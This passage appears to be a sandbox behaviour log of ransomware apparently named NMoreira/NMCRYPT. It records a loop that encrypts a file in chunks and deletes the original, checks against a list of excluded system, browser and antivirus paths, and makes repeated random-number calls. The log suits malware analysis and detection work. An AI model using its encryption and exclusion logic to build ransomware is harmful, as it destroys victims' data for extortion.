lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.654] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.654] GetLastError () returned 0x0 [0149.654] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.654] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.655] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.655] GetLastError () returned 0x0 [0149.655] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.655] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.656] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.656] GetLastError () returned 0x0 [0149.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.656] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.656] GetLastError () returned 0x0 [0149.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.656] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.656] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.656] GetLastError () returned 0x0 [0149.656] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.659] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 1 [0149.660] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0 [0149.660] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" [0149.660] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0149.660] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBB97.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxbb97.tmp")) returned 0xbb97 [0149.662] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBB97.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxbb97.tmp"), dwFlags=0x1) returned 0 [0149.662] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBB97.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxbb97.tmp")) returned 1 [0149.662] CryptDestroyKey (hKey=0x9ad338) returned 1 [0149.662] wcslen (_String="OK") returned 0x2 [0149.662] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.662] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.662] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0149.662] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0149.662] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0149.662] PathMatchSpecW (pszFile="delete.avi", pszSpec="*NMCRYPT") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*Recovers your files.html") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.exe") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.dll") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.lnk") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.bat") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.ini") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.msi") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*.scf") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*pagefile.sys*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*NTUSER.DAT*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*AppData*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\winrar\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\java\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\windows\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\ESET\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\AVG\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\AVIRA\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*Atheros*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*Realtek*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*bootmgr*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*boot*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*boot*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*CONFIG.SYS*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*IO.SYS*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*MSDOS.SYS*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*NTDETECT.COM*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*ntldr*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*chrome*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*opera*") returned 0 [0149.663] PathMatchSpecW (pszFile="delete.avi", pszSpec="*firefox*") returned 0 [0149.663] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi", pszSpec="*") returned 1 [0149.663] strlen (_Str="NMoreira") returned 0x8 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.663] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.664] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 